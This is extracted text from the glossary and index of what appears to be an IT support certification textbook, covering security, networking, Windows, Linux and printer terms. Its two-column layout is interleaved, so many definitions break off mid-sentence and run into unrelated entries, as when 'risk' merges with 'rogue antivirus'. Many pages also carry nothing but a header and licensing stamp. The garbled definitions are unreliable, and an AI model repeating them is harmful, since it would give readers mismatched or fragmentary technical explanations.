LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 31
risk Likelihood and impact (or to alarm users and promote installation
consequence) of a threat actor of Trojan malware.
exercising a vulnerability.
sandbox Computing environment
risk analysis Process for qualifying or that is isolated from a host system
quantifying the likelihood and impact of to guarantee that the environment
a factor. runs in a controlled, secure fashion.
Communication links between the
rm command Command-line tool for
sandbox and the host are usually
deleting file system objects in Linux.
completely prohibited so that malware
rmdir command Command-line tool or faulty software can be analyzed in
for deleting directories in Windows. isolation and without risk to the host.
The /s switch enables the deletion of
sanitization Process of thoroughly
non-empty directories.
and completely removing data from a
roaming profile Configuring a network storage medium so that file remnants
share to hold user profile data. The data cannot be recovered.
is copied to and from the share at logon
screen lock Mobile-device mechanism
and logoff.
that locks the screen after a period of
robocopy command Command-line file inactivity.
copy utility recommended for use over
screened subnet Segment isolated
the older xcopy.
from the rest of a private network by
roll back updates/drivers Windows one or more firewalls that accepts
troubleshooting feature that allows connections from the Internet over
removal of an update or reversion to a designated ports.
previous driver version.
screensaver lock Security mechanism
root access (mobile) Gaining that locks the desktop after a period
superuser-level access over an Android- of inactivity and requires the user to
based mobile device. authenticate to resume.
rootkit Class of malware that modifies screen-sharing Software that allows
system files, often at the kernel level, to clients to view and control the desktop
conceal its presence. over a network or the Internet.
run as administrator Windows feature script Series of simple or complex
that requires a task to be explicitly commands, parameters, variables, and
launched with elevated privileges and other components stored in a text file
consented to via UAC. and processed by a shell interpreter.
run dialog Windows interface for secure connection Using HTTPS to
executing commands. browse a site where the host has
presented a valid digital certificate
safe mode Troubleshooting startup
issued by a CA that is trusted by the
mode that loads a limited selection of
browser. A padlock icon is shown
drivers and services.
to indicate the secure status of the
Samba Linux software package that connection.
implements Server Message Block
secure erase (SE) Method of sanitizing a
(SMB) file/print sharing, primarily to
drive using the ATA command set.
support integration with Windows
hosts. Secure Shell (SSH) Application protocol
supporting secure tunneling and remote
retention Process an organization uses
terminal emulation and file copy. SSH
to maintain the existence of and control
runs over TCP port 22.
over certain data in order to comply
with business policies and/or applicable security group Access control
laws and regulations. feature that allows permissions to
be allocated to multiple users more
rogue antivirus Spoofed desktop
efficiently.
notifications and browser ads designed
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
32 | Glossary
service set identifier (SSID) Character smart card Security device similar to a
string that identifies a particular wireless credit card that can store authentication
LAN (WLAN). information, such as a user’s private key,
on an embedded cryptoprocessor.
services console (services.msc)
Windows machines run services to social engineering Activity where the
provide functions; for example, goal is to use deception and trickery to
Plug-and-Play, the print spooler, DHCP convince unsuspecting users to provide
client, and so on. These services can sensitive data or to violate security
be viewed, configured, and started/ guidelines.
stopped via the Services console. You
soft token Either an additional code
can also configure which services run
to use for 2-step verification, such as
at startup using msconfig. You can
a one-time password, or authorization
view background services (as well as
data that can be presented as evidence
applications) using the Processes tab
of authentication in an SSO system.
in Task Manager.
Sound applet Control Panel applet
sfc command Command-line utility
related to speaker and microphone
that checks the integrity of system and
configuration plus Windows sound
device driver files.
events and notifications.
SH Extension for a Linux shell script file
spear phishing Email-based or web-
format. The shebang in the first line of
based form of phishing that targets
the script identifies the shell type (Bash,
specific individuals.
for instance).
spinning wait cursor macOS indicator
shell System component providing a
that a process is busy and is not able to
command interpreter by which the user
accept input.
can use a kernel interface and operate
the OS. splash screen Displaying terms of use
or other restrictions before use of a
short message service (SMS) System
computer or app is allowed.
for sending text messages between cell
phones. spoofing Attack technique where the
threat actor disguises his or her identity
shoulder surfing Social engineering
or impersonates another user or
tactic to obtain someone’s password or
resource.
PIN by observing him or her as he or she
types it in. spotlight search macOS file system
search tool.
shutdown command Command-line
tool for shutting down or restarting the spyware Software that records
computer. The command is supported information about a PC and its users,
by Windows and Linux, though with often installed without the user’s
different syntax. consent.
Simultaneous Authentication of standard account Non-privileged user
Equals (SAE) Personal authentication account in Windows that typically has
mechanism for Wi-Fi networks membership of the Users security group
introduced with WPA3 to address only.
vulnerabilities in the WPA-PSK method.
standard formatting Using a vendor
single sign-on (SSO) Authentication tool to delete the file system and/or
technology that enables a user partition table on storage media before
to authenticate once and receive recycling or repurposing. This method
authorizations for multiple services. carries the greatest risk of leaving
persistent data remnants.
sleep Power-saving mode in Windows.
On a laptop, this functions much like standard operating procedure (SOP)
standby, but on a desktop, the system Documentation of best practice and
also creates a hibernation file before work instructions to use to perform a
entering the standby state. common administrative task.
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 33
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
34 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Glossary | 35
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
36 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index
Page numbers with Italics represent charts, graphs, and diagrams.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-2 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-3
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-4 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-5
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-6 | Index
hardware compatibility and internet connection content filters, 214, 567, 567
update limitations, 408–409, types, 160–169 control and digital content
409 network configuration protection (HDCP), 9
network compatibility, 409 concepts, 189–197 Control Panel, Windows, 338,
software compatibility, 409 protocols and ports, 338
user training and support, 183–188 cooling systems, 48–49
409–410 TCP/IP, 170–182 fan, 48–49
complementary metal-oxide printers, 300, 300 liquid-based, 49, 49–50
semiconductor (CMOS) battery, utilities, Windows, 357 other components
113 connectionless requiring, 48
complex instruction set communication, 185 passive (fanless) cooling, 73
computing (CISC), 73 “connection-oriented” protocol, copper cabling
component handling, proper, 184 Cat standards, 135, 135
712, 712, 713 connectivity issues, mobile OS, connectors, 135, 135–136
component issues, 110–112 288–289, 289, 636–637 RJ11 connectors, 136
application crashes, 110 connectors, 2–16, 4, 4–5 RJ45 connectors, 126,
burning smell, 110 adapter, 22–24 127, 135, 135–136
capacitor swelling, 111 eSATA, 14 direct burial, 141
intermittent shutdowns, guidelines for installing and installation considerations,
110 configuring, 42 141
overheating, 110–111 Lightning, 12, 12 installation tools, 136–138
physical damage, 111–112 Molex connector, 14, 14 cable stripper, 136–137,
component storage, 713 peripheral devices, 4, 4–5, 5 137
COM (Communications) port, personal computers, 2–4, 3 crimper, 138, 138
38 SATA, 13, 13 punchdown tool, 137,
computer-aided design (CAD), storage, 21–22 137
28 Thunderbolt, 11–12, 12, 28 snips, 137
Computer Security Incident types, 20, 20 labeling system, 127
Response Team (CSIRT), USB cables, 5–8, 6, 7, 8 for network, 133
666–667 video cables, 9–11 plenum space, 141
confidential and private console switching, Linux, 509 shielded twisted pair (STP),
materials, 699 consumables, 309–324 134, 134
confidentiality, integrity, and carriage system, 315, 316 standard (10GBASE-T), 120,
availability (CIA triad), 542 impact printer 127, 135
configuration. see also maintenance, 320–321 test tools, 138–140
installing and configuring inkjet printer imaging cable tester, 138, 139
issues process, 314–315, 315 loopback plug, 139,
mobile OS, 637 inkjet printer maintenance, 140
wireless, 220 316–318 tone generator, 139
management model, 692 laser printer imaging toner probe, 139
mobile devices, 261–273 process, 309–312 unshielded twisted pair
account setup, 263, 264 laser printer maintenance, (UTP), 133, 133
email, 265–267 312–314 corporate and ISP email
mobile apps, 261–263 thermal printer configuration, 266–267, 267
mobile device maintenance, 318–319 corporate applications, 270
synchronization (sync), 3-D printer maintenance, corporate mail gateway, 267
264–269 321–323 corporate owned, business
network addressing and containerization, 230 only (COBO), 623
internet connections container virtualization, 230, corporate owned, personally
guidelines for installing 231 enabled (COPE), 623
and configuring SOHO content delivery networks corporate policies and
networks, 198 (CDNs), 238 procedures, 86
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-7
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-8 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-9
Domain Name System (DNS), drivers, third-party, Windows, electrical safety, 19, 707–709
186, 191–194, 192 421 equipment grounding, 708,
hierarchy, 192 Drivers tab, Windows, 364 708–709
IPv4 addresses, 176 drives, Windows, 344, 394 fire, 709
queries, 192, 193 DRM (digital rights fuses, 708
resource records, 193, management), 63 proper power handling and
193–194 dual-channel memory, 69, personal safety, 709
spam management 69–70 electromagnetic interference
records, 194 dual inline memory module (EMI), 287
domain setup, Windows, (DIMM), 21, 67–70, 68, 69 electronic door locks, 574
499–500, 500, 501 dual stack, 181 electrostatic discharge (ESD),
door locks, 574, 574–575 du command, Linux, 515 19, 19, 55, 68, 75, 711–713
dot matrix print defects, 328 dumpster diving, 545 component handling,
dotted decimal notation, 172, duplexing assembly, 312, 316 proper, 712, 712, 713
172 duplex printing, 312 component storage, 713
Double Data Rate (GDDR), 28 duplex unit, 300 email, 204, 204
Double Data Rate SDRAM (DDR duress alarms, 576 scan to, 307
SDRAM), 67, 67–68 dust build up, 49 Windows, 339
down-plugging, 23 dust protection, 286 email, mobile device, 265–267
drawing pad, 247 DVD, 93 commercial provider email
drifting out of sync, Windows, DVD-R/RW, 62–63 configuration, 266, 266
447 DVD+R/RW, 62–63 corporate and ISP email
drive (HDD) activity lights, 27 DVDs (Digital Versatile Discs), configuration, 266–267, 267
drive availability, 102–103 62–63 IMAP, 267
bad sectors, 103 DVI (Digital Visual Interface), incoming mail server, 267
blue screen of death 34–35, 35 outgoing mail server, 267
(BSOD), 103 dynamic disks, Windows, 368, POP3, 267
bootable device not found, 406 ports, 267
103 Dynamic Host Configuration synchronizing, 265
clicking sound, 103 Protocol (DHCP), 177, 177, 185, TLS, 266, 267
constant LED activity, 103 186, 189–191, 190 embedded and Internet
grinding noise, 103 Client, 186 appliances, compared. see
LED status indicator activity, leases, 189–191, 190 Internet and embedded
103 reservations, 191, 568 appliances, compared
missing drives in OS, 103 scope, 189 embedded systems, 215–216
read/write failure, 103 Windows, 457 SCADA systems, 215
drive configuration, 56 dynamic RAM, 67 workflow and process
drive enclosures, 60–61, 61 automation systems, 215
drive format, Windows, 425, E emulation, 73
425 Encrypting File System (EFS),
EAP over Wireless (EAPoW),
drive reliability and 589–591, 590
558
performance, 103–105, 104, encryption, 552
EAP with Transport Layer
105 encryption settings, 565,
Security (EAP-TLS), 559, 560
data loss/corruption, 105 566
Ease of Access settings,
extended read/write times, end of life (EOL), 215
Windows, 342, 342
103 end of life (EOL) system, 410,
ECC (error correcting code)
file recovery software, 105, 544
RAM, 70
105 endorsement key, 96
EIDE (extended IDE), 37
IOPS, 105 endpoint detection and
802.1X enterprise, 558
SMART, 103, 104 response (EDR)
802.11 standards, 31
driver roll back, Windows, 439, remote access technologies,
elasticity, 235, 236
439–440, 440 653
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-10 | Index
endpoint management event sources and severity fan assembly, 48, 50, 76
software, 270 levels, 379 fan connectors, 28
end-user acceptance, 694 evil twin, 546–547 fan considerations, 94
end user best practices, Evolution-Data Optimized fan cooling systems, 48–50
workstation, 582 (EV-DO), 251 fan assembly, 48, 50, 76
end-user license agreement Exchange ActiveSync account, fans, 49
(EULA), 665 266 heat sink, 48, 48–49, 50, 67,
ENERGY STAR 80 PLUS execute, 65, 72, 73 76
compliant PSU, 45 execution control, workstation, thermal pad, 48
enterprise apps, mobile OS, 584–585, 585 thermal paste, 48–49
640–641, 641 AutoPlay, 585, 585 fan exhaust, 3, 3
enterprise mobility autorun.inf, 585 fans, 49
management (EMM), 270, trusted/untrusted software Fast Ethernet (100BASE-T), 120,
270–271, 271, 623, 623–624 sources, 584–585 127, 135, 135
enterprise wipe, mobile OS, exFAT, Windows, 407 FAT32, Windows, 407
627 expansion card, 28 FAT/FAT32, Linux, 408
environmental impacts, expansion card slot, 3, 4 feature updates, Windows,
710–711 expansion slots, memory slots 413, 421
dust cleanup, 710–711 compared to, 68 feed assembly, thermal printer,
humidity control, 711 exposing stage, 310 319
temperature control, 711 ext3/ext4, Linux, 408 feed roller, 310, 311
ventilation control, 711 extended IDE (EIDE), 37 feed trays, 300
environmental procedures. Extended Page Table (EPT), 74, fetch, 65, 72, 73
see safety and environmental 231 Fiber Channel and Internet
procedures Extensible Authentication SCSI (iSCSI), 123
environmental regulations, Protocol (EAP), 558–560, 560 fiber channel (FC) connector,
707 extensible firmware interface 142
environment variables, (EFI), 434–435 fiber optic cable, 142
Windows, 349 extensions, browser, 595 fiber to the curb (FTTC) and
EPT (Extended Page Table), 74 extensions, virtualization, 231 very high-speed DSL (VDSL),
equipment locks, 575, 575 external drives, Windows, 423 164
erasing/wiping software, 669 external hardware token, fiber to the premises (FTTP)
error checking, 70 Windows, 429 and optical network terminals
error correcting code (ECC) external interference, 219 (ONTs), 164–165, 165
RAM, 70 external SATA (eSATA), 14, 22 fiber to the X (FTTx), 164
error event, Windows, 379 external threats, 547 field-replaceable units (FRU),
eSATA (external SATA), 14, 22 extruder, 322 277
escalate, 85–86 filament, 323
escalation levels, 688–689 F file editors, Linux, 510–511
escaping, Linux, 513 File Explorer, Windows, 343,
facial recognition, mobile OS,
ESD (electrostatic discharge), 343–346
621
19, 19, 55, 68, 75 directory structure, 344
facial recognition, Windows,
ethernet print device drives, 344
484
connectivity, 296–297, 297 File Explorer Options, 345,
factory reset, mobile OS, 632
Ethernet tab, Windows, 382 345
failed attempts lockout,
event sources and severity folders, 344
workstation, 583
levels, Windows, 379 Indexing Options, 346,
failed login attempts, mobile
Event Viewer (eventvwr.msc), 346
OS, 621
Windows, 359, 378, 378–379 Network object, 460
fake security warnings, mobile
Applications and Services system files, 344
OS, 642
Logs, 379 system objects, 343
fan, 3-D printer, 322
Default Log Files, 378–379 fileless malware, 604
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-11
file management commands, apps, mobile OS, 623 FPU (floating-point unit), 72
Linux, 514–515 configuration, 567, 567 frame rate, 9
cp command, 514 security, 567, 567 frames per second (fps), 9
df command, 515 Windows Defender Firewall, frequency bands, 146
du command, 515 588, 588–589, 589 2.4 GHz, 146, 147–148, 148
mv command, 514 firmware update, 564, 567 5 GHz, 146–147
rm command, 514 Firmware Upgrade, 564, 565 20 MHz channels used
file management commands, 5G, 167, 251 in, 147
Windows, 394 5 GHz channel layout, 147, 147 6 GHz standard, 150
file permission commands, 5 VDC, 46, 46 channels, 146
Linux, 516–517 fixboot, Windows, 42 licensed or unlicensed, 153
chmod command, 517, 517 fixed disk (HDD or SSD), 93 WLAN installation
chown command, 517 fixed wireless internet access, considerations, 151
octal notation, 517 165–166 frequently asked questions
file/print servers, 200–201 geostationary orbital (FAQs), 692
FTP, 201 satellite internet access, 165 frequent shutdowns, Windows,
NetBIOS, 201 low Earth orbit (LEO) 445
SMB, 200 satellite internet access, 166 FTP over Secure Shell (SFTP),
file recovery software, 105, 105 wireless internet service 201
files providers (WISPs), 166 FTP-Secure (FTPS), 201
listing, in Windows, 392 flash chips, 54 F-type connector, 143, 143
sharing, in Windows, flash drives, 61, 61, 423 fully qualified domain name
492–493, 493 flashing screen, 115 (FQDN), 191–192, 202, 203
synchronization, 238 flash memory, 113 fuser, 311
system errors and flat-panel display, 9 fuser assembly, 311
anomalies, browser, 608 floating-point unit (FPU), 72 fuses, 708
file server, 200 foiled twisted pair (FTP), 134, fusing stage, 311
Windows, 494, 494 134 fuzzy image, 115
fileshare, 200 foiled/unshielded twisted pair
File Transfer Protocol (FTP), (F/UTP), 134, 134
186, 201 foil outer shield (F/FTP), 134
G
file transfer software, 654 folder redirection, Windows, Galois Counter Mode Protocol
FileVault, macOS, 529–530 503, 503 (GCMP), 557
find command, Linux, 513 folders, Windows, 344 Gaming settings, Windows, 356
Finder, macOS, 530 Force Quit, macOS, 536, 537 garbled print, 330
fingerprint sensors format command, Windows, GB (gigabytes), 65
mobile OS, 281, 621 396 GDDR (Double Data Rate), 28
SOHO, 574 formatting, Windows, 368 gears, 3-D printer, 322
Windows, 484 form factors, 24–26 General tab, Windows, 387, 387
finisher unit, 328 ATX, 24 G/E or 1X, 251
finishing issues, 328–329 function of, 24 geostationary orbital satellite
hole punch, 329 for HDDs, 56 internet access, 165
incorrect page orientation, installation, 25–26, 26 gesture support, 248
328–329 ITX, 25 gesture support, macOS, 526
staple jam, 329 laptop, 275, 278 Gigabit Ethernet (1000BASE-T),
Finishing tab, printer, 303 smartphone, 246 120, 125, 128, 135, 135, 136,
finishing tab in printing forwarding, IPv4, 173, 173–174, 140
preferences, 329 174 gigabytes (GB), 65
fire, electrical, 709 4G, 166, 251 global addressing, 181
Firewall & network protection 4G+, 251 globally unique identifier
page, Windows, 460, 460 4-lane SSDs, 55 (GUID) partition table (GPT),
firewalls, 168, 168, 213 fps (frames per second), 9 425, 434
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-12 | Index
Global Positioning System hard disk drive (HDD), laptop, hide protected operating
(GPS), 272 280, 280 system files, Windows, 345
Global System for Mobile hard token, Windows, 483 high availability (HA), in cloud,
Communication (GSM), 166, hardware-assisted 235
251 virtualization, 74 High-Definition Multimedia
Google Play, 262, 262 hardware compatibility Interface (HDMI), 9–10, 10, 28,
Google Workspace, 263 update limitations, 29
gpresult, Windows, 487 408–409, 409 high density (HD) connectors,
GPU (Graphics Processing Windows, 420 36
Unit), 28 Hardware Compatibility List high network traffic, mobile
gpupdate, Windows, 487 (HCL), 421 OS, 642
grandfather-father-son (GFS), hardware failure issues, mobile High Speed Packet Access
659 device, 286 (HSPA), 251
graphical interface fails to hardware port, 4, 5 hole punch, 329
load/black screen, Windows, hardware security module home automation systems,
442 (HSM), 96 mobile OS, 628, 628
graphics memory, 28 hash, 552 home client OS, 402
Graphics Processing Unit hashing, 552 home folders, Windows,
(GPU), 28 HD (high density) connectors, 501–502, 502
Graphics Processing Unit 36 home router, 563–564
(GPU), monitoring in Windows, HDCP (control and digital changing channels, 566
381 content protection), 9 disable guest access, 566
grep command, Linux, 513 HDD (hard disk drive), 55, encryption settings, 565,
grid power, 45, 48 55–56 566
grinding noise, 103 HDMI (High-Definition firewall configuration, 567,
grounding, equipment, 708, Multimedia Interface), 4, 9–10, 567
708–709 10, 28, 29 Internet access, 564
group management headers, 27, 27 LAN configuration, 565–566
commands, Linux, 516 audio ports, 27, 27 physical placement, 563
group policy, Windows, HDD activity lights, 27 port forwarding, 568–569
486–487, 487 power button (soft power), setup, 563–564
updates, 487 27 SSID, 565
Group Policy Editor (gpedit. USB ports, 27 WAN IP, 564
msc), Windows, 373, 373, 414 headset, 248 WLAN configuration,
guest account, workstation, health and safety laws, 707 565–566
583 healthcare data, 664 host address configuration,
guest OS security, 233 heating element, in thermal IPv4, 175–176, 176
guest OS (or host-based) printer, 319 host name, 191
system, 228, 229 heat-sensitive print side, of hostname command,
GUID [globally unique thermal paper, 319 Windows, 467
identifier] Partition Table (GPT), heat sink, 48, 48–49, 50, 67, 76 host number (host ID), 172, 172
424, 425 help system host security, 233
gyroscopes, 246 Linux, 510 hotspots, 253, 253, 254
Windows, 392 hot swap, 56, 106
hertz (Hz), 9 HSM (hardware security
H hex, 126 module), 96
half-duplex, 128 H/H+, 251 hub/control system, 216
handshake sequence, 184, 184 hibernate, Windows, 397 hubs, 127–128, 128
hard disk drive (HDD), 21, 55, Hibernate/Suspend to Disk, human–machine interface
55–56 Windows, 353 (HMI), 215
activity lights, 27 hidden files and folders, hybrid deployment model, 236
hard-disk drive (HDD), fixed, 93 Windows, 345 hybrid fiber coax (HFC), 163
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-13
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-14 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-15
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-16 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-17
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-18 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-19
multi-level cell (MLC) NAND, 54 NetBIOS over TCP/IP, 186 network monitoring
multi-mode fiber (MMF), 142 netstat command, Windows, servers, 209–210
multiple displays 473 remote terminal access
macOS, 525 net user commands, Windows, servers, 207–208
Windows, 352 479, 495 web servers, 201–203
multiple input multiple output network access point (NAP), Network File System (NFS), 408
(MIMO), 167 206 networking, virtualization and,
multi-socket motherboard, 74, network access server (NAS), 233
77 206 network interface card (NIC),
multitenant (or public) network address translation 30–31, 31, 125–126, 126
deployment model, 236 (NAT), 175 Network & Internet utilities,
multiuser MIMO (MU-MIMO), Network and Sharing Center, Windows, 357
150 Windows, 357 network location, Windows,
mv command, Linux, 514 Network Basic Input/Output 459–460
MX record, 194 System (NetBIOS), 201 Network Location Awareness
network boot, Windows, 424 (NLA), Windows, 459, 459
network cable types, 133–144 network management
N coaxial (coax) cable, 143, commands, Linux, 521
name resolution, Windows, 143 dig command, 521
471–472, 472 copper cabling ip command, 521
NAND (NOT AND) flash connectors, 135, Samba command, 521
memory, 54 135–136 network monitoring, Windows,
navigation commands installation 382
Linux, 511, 511–512 considerations, 141 network monitoring servers,
cat command, 512 installation tools, 209–210
cd command, 512 136–138 SNMP, 209, 209
Is command, 512 test tools, 138–140 syslog, 210, 210
pwd command, 512 network tap, 140 network number (network ID),
Windows, 392–394 optical cabling, 141, 172, 172
changing the current 141–142, 142 Network object in File Explorer,
directory, 393, 393 twisted pair cable, 134–136 Windows, 460
changing the current network compatibility, 409 Network Operating System
drive, 394 network configuration (NOS), 402
listing files and concepts, 189–197 network ports, Windows, 473,
directories, 392–393 DHCP, 189–191, 190 473
nC/nT notation, 74 DNS, 191–194, 192 network prefixes, 172, 172–173
Nearby Share, Android, 637, VLANs, 195, 195–196 IPv4, 172, 172–173
654 VPNs, 196, 196 IPv6, 180
Nearby Sharing, Microsoft, 492, Network Connections (ncpa. network printer using a vendor
654 cpl) utilities, Windows, 357 tool, 303
Near Field Communications network drives, remapping, network profile, Windows, 459
(NFC), 155 679 network/PXE, 93
scanner, 281 networked hosts, services network reset, Windows,
troubleshoot, 637 provided by, 200–211 468
wireless connections, 257, directory and network scan services, 307
257 authentication servers, network services, supporting
Neighbor Discovery (ND), 181 206–207 guidelines for, 225–226
nested RAID solutions, 56 file/print servers, 200–201 Internet and embedded
RAID 0 (striping without Hypertext Transfer Protocol appliances, compared,
parity), 57, 58 Secure (HTTPS), 203, 204 212–217
RAID 1 (mirroring), 58, mailbox servers, 205–206 networked hosts, services
58–59 mail servers, 204–205 provided by, 200–211
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-20 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-21
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-22 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-23
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-24 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-25
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-26 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-27
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-28 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-29
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-30 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-31
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-32 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-33
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-34 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-35
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-36 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-37
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
I-38 | Index
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Index | I-39
Index
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022